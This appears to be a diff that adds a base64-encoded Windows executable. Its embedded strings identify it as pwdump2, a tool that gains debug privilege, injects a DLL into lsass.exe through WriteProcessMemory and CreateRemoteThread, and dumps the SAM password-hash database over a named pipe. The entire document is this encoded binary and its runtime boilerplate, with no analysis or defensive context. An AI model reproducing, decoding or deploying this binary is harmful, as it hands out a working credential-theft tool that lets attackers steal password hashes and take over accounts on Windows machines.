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
+AAAAAF9eW8nDx0X8AQAAAI0ENoPAAyT86Bv+//+JZeiL3Ild4INN/P/rEmoBWMOLZegz/zPbg038
+/4t12DvfdLRWU/915P913P91DP91CP8V6GBAAIXAdJw5fRxXV3UEV1frBv91HP91GFZTaCACAAD/
+dSD/FaxgQACL8Dv3D4Rx////i8bpbP///4tUJAiLRCQEhdJWjUr/dA2AOAB0CECL8UmF9nXzgDgA
+XnUFK0QkBMOLwsP/JbhgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAqGcAAJBnAAB4ZwAAAAAAABRmAABKZgAAWmYAAGpmAAB4ZgAAhmYAAJpmAACqZgAA
+JGYAADpmAADoZgAA/mYAABRnAAAqZwAANmcAAEpnAABWZwAAAmYAANZmAADAZgAA/mcAAMpnAADW
+ZwAA5GcAAPBnAAD0ZQAAEmgAACRoAAAyaAAAQGgAAE5oAABcaAAAbGgAAH5oAACOaAAAnGgAAK5o
+AADKaAAA5GgAAP5oAAAUaQAALGkAAEZpAABSaQAAXmkAAHJpAACIaQAAmmkAAKxpAAC+aQAAymkA
+ANRpAADgaQAA8GkAAABqAAAAAAAA/////wcdQAAbHUAABgAABgABAAAQAAMGAAYCEARFRUUFBQUF
+BTUwAFAAAAAAICg4UFgHCAA3MDBXUAcAACAgCAAAAAAIYGhgYGBgAABwcHh4eHgIBwgAAAcACAgI
+AAAIAAgABwgAAAAoAG4AdQBsAGwAKQAAAAAAKG51bGwpAABydW50aW1lIGVycm9yIAAADQoAAFRM
+T1NTIGVycm9yDQoAAABTSU5HIGVycm9yDQoAAAAARE9NQUlOIGVycm9yDQoAAFI2MDI4DQotIHVu
+YWJsZSB0byBpbml0aWFsaXplIGhlYXANCgAAAABSNjAyNw0KLSBub3QgZW5vdWdoIHNwYWNlIGZv
+ciBsb3dpbyBpbml0aWFsaXphdGlvbg0KAAAAAFI2MDI2DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9y
+IHN0ZGlvIGluaXRpYWxpemF0aW9uDQoAAAAAUjYwMjUNCi0gcHVyZSB2aXJ0dWFsIGZ1bmN0aW9u
+IGNhbGwNCgAAAFI2MDI0DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIF9vbmV4aXQvYXRleGl0IHRh
+YmxlDQoAAAAAUjYwMTkNCi0gdW5hYmxlIHRvIG9wZW4gY29uc29sZSBkZXZpY2UNCgAAAABSNjAx
+OA0KLSB1bmV4cGVjdGVkIGhlYXAgZXJyb3INCgAAAABSNjAxNw0KLSB1bmV4cGVjdGVkIG11bHRp
+dGhyZWFkIGxvY2sgZXJyb3INCgAAAABSNjAxNg0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciB0aHJl
+YWQgZGF0YQ0KAA0KYWJub3JtYWwgcHJvZ3JhbSB0ZXJtaW5hdGlvbg0KAAAAAFI2MDA5DQotIG5v
+dCBlbm91Z2ggc3BhY2UgZm9yIGVudmlyb25tZW50DQoAUjYwMDgNCi0gbm90IGVub3VnaCBzcGFj
+ZSBmb3IgYXJndW1lbnRzDQoAAABSNjAwMg0KLSBmbG9hdGluZyBwb2ludCBub3QgbG9hZGVkDQoA
+AAAATWljcm9zb2Z0IFZpc3VhbCBDKysgUnVudGltZSBMaWJyYXJ5AAAAAAoKAABSdW50aW1lIEVy
+cm9yIQoKUHJvZ3JhbTogAAAALi4uADxwcm9ncmFtIG5hbWUgdW5rbm93bj4AAAAAAAAAAAAA////
+/+tMQADvTEAAR2V0TGFzdEFjdGl2ZVBvcHVwAABHZXRBY3RpdmVXaW5kb3cATWVzc2FnZUJveEEA
+dXNlcjMyLmRsbAAA/////79WQADDVkAA/////3NXQAB3V0AAFGUAAAAAAAAAAAAAamcAABBgAAAE
+ZQAAAAAAAAAAAAC8ZwAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqGcAAJBnAAB4ZwAAAAAAABRm
+AABKZgAAWmYAAGpmAAB4ZgAAhmYAAJpmAACqZgAAJGYAADpmAADoZgAA/mYAABRnAAAqZwAANmcA
+AEpnAABWZwAAAmYAANZmAADAZgAA/mcAAMpnAADWZwAA5GcAAPBnAAD0ZQAAEmgAACRoAAAyaAAA
+QGgAAE5oAABcaAAAbGgAAH5oAACOaAAAnGgAAK5oAADKaAAA5GgAAP5oAAAUaQAALGkAAEZpAABS
+aQAAXmkAAHJpAACIaQAAmmkAAKxpAAC+aQAAymkAANRpAADgaQAA8GkAAABqAAAAAAAAwwBGcmVl
+TGlicmFyeQBTAUdldFByb2NBZGRyZXNzAADfAUxvYWRMaWJyYXJ5QQAA/QJXYWl0Rm9yU2luZ2xl
+T2JqZWN0AE0AQ3JlYXRlVGhyZWFkAAA0AENyZWF0ZUV2ZW50QQAALQFHZXRMYXN0RXJyb3IAABEC
+T3BlblByb2Nlc3MAHgBDbG9zZUhhbmRsZQAJAUdldEN1cnJlbnRQcm9jZXNzAPICVmlydHVhbEZy
+ZWVFeABJAENyZWF0ZVJlbW90ZVRocmVhZAAAFwNXcml0ZVByb2Nlc3NNZW1vcnkAAO8CVmlydHVh
+bEFsbG9jRXgAAAoBR2V0Q3VycmVudFByb2Nlc3NJZAA4AUdldE1vZHVsZUZpbGVOYW1lQQAAZQBE
+aXNjb25uZWN0TmFtZWRQaXBlAD0CUmVhZEZpbGUAACYAQ29ubmVjdE5hbWVkUGlwZQAAkAJTZXRF
+dmVudAAARABDcmVhdGVOYW1lZFBpcGVBAABLRVJORUwzMi5kbGwAABkAQWRqdXN0VG9rZW5Qcml2
+aWxlZ2VzABgBTG9va3VwUHJpdmlsZWdlVmFsdWVBAGcBT3BlblByb2Nlc3NUb2tlbgAAQURWQVBJ
+MzIuZGxsAAC6AUhlYXBGcmVlAAC9AUhlYXBSZUFsbG9jALQBSGVhcEFsbG9jAIwARXhpdFByb2Nl
+c3MAywJUZXJtaW5hdGVQcm9jZXNzAADaAEdldENvbW1hbmRMaW5lQQCOAUdldFZlcnNpb24AALgB
+SGVhcERlc3Ryb3kAtgFIZWFwQ3JlYXRlAADxAlZpcnR1YWxGcmVlAO4CVmlydHVhbEFsbG9jAACY
+AlNldEhhbmRsZUNvdW50AABoAUdldFN0ZEhhbmRsZQAAKAFHZXRGaWxlVHlwZQBmAUdldFN0YXJ0
+dXBJbmZvQQDbAlVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAAwQBGcmVlRW52aXJvbm1lbnRTdHJp
+bmdzQQDCAEZyZWVFbnZpcm9ubWVudFN0cmluZ3NXAAEDV2lkZUNoYXJUb011bHRpQnl0ZQAZAUdl
+dEVudmlyb25tZW50U3RyaW5ncwAbAUdldEVudmlyb25tZW50U3RyaW5nc1cAAFcCUnRsVW53aW5k
+AA4DV3JpdGVGaWxlALkARmx1c2hGaWxlQnVmZmVycwAAAgJNdWx0aUJ5dGVUb1dpZGVDaGFyAGkB
+R2V0U3RyaW5nVHlwZUEAAGwBR2V0U3RyaW5nVHlwZVcAAJUCU2V0RmlsZVBvaW50ZXIAAM8AR2V0
+Q1BJbmZvAMkAR2V0QUNQAABGAUdldE9FTUNQAACoAlNldFN0ZEhhbmRsZQAA3AFMQ01hcFN0cmlu
+Z0EAAN0BTENNYXBTdHJpbmdXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAHQZQADUUkAAAAAAAAAAAAAZGkAAAAAAAAAAAAAAAAAAAAAAAEwAUwBBAFMA
+UwAuAEUAWABFAAAAUnRsQ29tcGFyZVVuaWNvZGVTdHJpbmcATnRRdWVyeVN5c3RlbUluZm9ybWF0
+aW9uAAAAAE5URExMAAAAClB3ZHVtcDIgLSBkdW1wIHRoZSBTQU0gZGF0YWJhc2UuClVzYWdlOiAl
+cyA8cGlkIG9mIGxzYXNzLmV4ZT4KAEZhaWxlZCBzdGFydGluZyBsaXN0ZW4gb24gcGlwZTogJWQu
+ICBFeGl0aW5nCgAAAEZhaWxlZCB0byBjcmVhdGUgcmVjZWl2aW5nIHRocmVhZDogJWQuICBFeGl0
+aW5nCgAAAABGYWlsZWQgdG8gb3BlbiBsc2FzczogJWQuICBFeGl0aW5nLgoAAAAARmFpbGVkIGVu
+YWJsaW5nIERlYnVnIHByaXZpbGVnZS4gIFByb2NlZWRpbmcgYW55d2F5CgAAAABVbmFibGUgdG8g
+ZmluZCBsc2Fzcy5leGUgcGlkIGF1dG9tYXRpY2FsbHkuCllvdSBuZWVkIHRvIHNwZWNpZnkgb24g
+dGhlIGNvbW1hbmQgbGluZQoAAAAAVW5hYmxlIHRvIGFkanVzdCB0b2tlbiBwcml2aWxlZ2VzOiAl
+ZAoAAFVuYWJsZSB0byBsb29rdXAgcHJpdmlsZWdlOiAlZAoAU2VEZWJ1Z1ByaXZpbGVnZQAAAABV
+bmFibGUgdG8gb3BlbiBwcm9jZXNzIHRva2VuOiAlZAoAAABDcmVhdGVSZW1vdGVUaHJlYWQgZmFp
+bGVkOiAlZAoAAFdyaXRlUHJvY2Vzc01lbW9yeSBmYWlsZWQ6ICVkCgAAVmlydHVhbEFsbG9jRXgg
+ZmFpbGVkOiAlZAoAAFxcLlxwaXBlXHB3ZHVtcDItJWQARHVtcFNhbQBTYW1EdW1wLmRsbABGcmVl
+TGlicmFyeQBHZXRQcm9jQWRkcmVzcwAATG9hZExpYnJhcnlBAAAAAEtlcm5lbDMyAAAAACVzAABG
+YWlsZWQgdG8gY29ubmVjdCB0aGUgcGlwZTogJWQKAEZhaWxlZCB0byBjcmVhdGUgdGhlIHBpcGU6
+ICVkCgAAAAAAAACBQAAAAAAAAIFAAAEBAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAgAA
+AAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
